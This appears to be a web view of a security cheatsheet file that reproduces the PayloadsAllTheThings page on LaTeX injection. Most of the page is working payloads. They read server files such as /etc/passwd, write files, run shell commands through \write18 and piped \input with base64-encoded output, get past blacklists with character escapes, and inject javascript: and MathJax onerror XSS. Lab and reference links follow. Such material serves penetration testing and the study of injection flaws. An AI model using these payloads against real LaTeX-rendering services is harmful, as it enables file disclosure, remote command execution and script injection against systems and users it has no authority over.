daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (3921B)


      1 ---
      2 title: "LaTeX Injection"
      3 topic: "LaTeX Injection"
      4 topicSlug: "latex-injection"
      5 sourcePath: "LaTeX Injection/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/LaTeX%20Injection/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # LaTeX Injection
     12 
     13 > LaTeX Injection is a type of injection attack where malicious content is injected into LaTeX documents. LaTeX is widely used for document preparation and typesetting, particularly in academia, for producing high-quality scientific and mathematical documents. Due to its powerful scripting capabilities, LaTeX can be exploited by attackers to execute arbitrary commands if proper safeguards are not in place.
     14 
     15 ## Summary
     16 
     17 * [File Manipulation](#file-manipulation)
     18     * [Read File](#read-file)
     19     * [Write File](#write-file)
     20 * [Command Execution](#command-execution)
     21 * [Cross Site Scripting](#cross-site-scripting)
     22 * [Labs](#labs)
     23 * [References](#references)
     24 
     25 ## File Manipulation
     26 
     27 ### Read File
     28 
     29 Attackers can read the content of sensitive files on the server.
     30 
     31 Read file and interpret the LaTeX code in it:
     32 
     33 ```tex
     34 \input{/etc/passwd}
     35 \include{somefile} # load .tex file (somefile.tex)
     36 ```
     37 
     38 Read single lined file:
     39 
     40 ```tex
     41 \newread\file
     42 \openin\file=/etc/issue
     43 \read\file to\line
     44 \text{\line}
     45 \closein\file
     46 ```
     47 
     48 Read multiple lined file:
     49 
     50 ```tex
     51 \lstinputlisting{/etc/passwd}
     52 \newread\file
     53 \openin\file=/etc/passwd
     54 \loop\unless\ifeof\file
     55     \read\file to\fileline
     56     \text{\fileline}
     57 \repeat
     58 \closein\file
     59 ```
     60 
     61 Read text file, **without** interpreting the content, it will only paste raw file content:
     62 
     63 ```tex
     64 \usepackage{verbatim}
     65 \verbatiminput{/etc/passwd}
     66 ```
     67 
     68 If injection point is past document header (`\usepackage` cannot be used), some control
     69 characters can be deactivated in order to use `\input` on file containing `$`, `#`,
     70 `_`, `&`, null bytes, ... (eg. perl scripts).
     71 
     72 ```tex
     73 \catcode `\$=12
     74 \catcode `\#=12
     75 \catcode `\_=12
     76 \catcode `\&=12
     77 \input{path_to_script.pl}
     78 ```
     79 
     80 To bypass a blacklist try to replace one character with it's unicode hex value.
     81 
     82 * ^^41 represents a capital A
     83 * ^^7e represents a tilde (~) note that the ‘e’ must be lower case
     84 
     85 ```tex
     86 \lstin^^70utlisting{/etc/passwd}
     87 ```
     88 
     89 ### Write File
     90 
     91 Write single lined file:
     92 
     93 ```tex
     94 \newwrite\outfile
     95 \openout\outfile=cmd.tex
     96 \write\outfile{Hello-world}
     97 \write\outfile{Line 2}
     98 \write\outfile{I like trains}
     99 \closeout\outfile
    100 ```
    101 
    102 ## Command Execution
    103 
    104 The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
    105 
    106 ```tex
    107 \immediate\write18{id > output}
    108 \input{output}
    109 ```
    110 
    111 If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
    112 
    113 ```tex
    114 \immediate\write18{env | base64 > test.tex}
    115 \input{text.tex}
    116 ```
    117 
    118 ```tex
    119 \input|ls|base64
    120 \input{|"/bin/hostname"}
    121 ```
    122 
    123 ## Cross Site Scripting
    124 
    125 From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
    126 
    127 ```tex
    128 \url{javascript:alert(1)}
    129 \href{javascript:alert(1)}{placeholder}
    130 ```
    131 
    132 In [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html)
    133 
    134 ```tex
    135 \unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}
    136 ```
    137 
    138 ## Labs
    139 
    140 * [Root Me - LaTeX - Input](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Input)
    141 * [Root Me - LaTeX - Command Execution](https://www.root-me.org/en/Challenges/App-Script/LaTeX-Command-execution)
    142 
    143 ## References
    144 
    145 * [Hacking with LaTeX - Sebastian Neef - March 10, 2016](https://web.archive.org/web/20260209043241/https://0day.work/hacking-with-latex/)
    146 * [Latex to RCE, Private Bug Bounty Program - Yasho - July 6, 2018](https://web.archive.org/web/20210117203905/https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
    147 * [Pwning coworkers thanks to LaTeX - scumjr - November 28, 2016](https://web.archive.org/web/20161130151956/https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)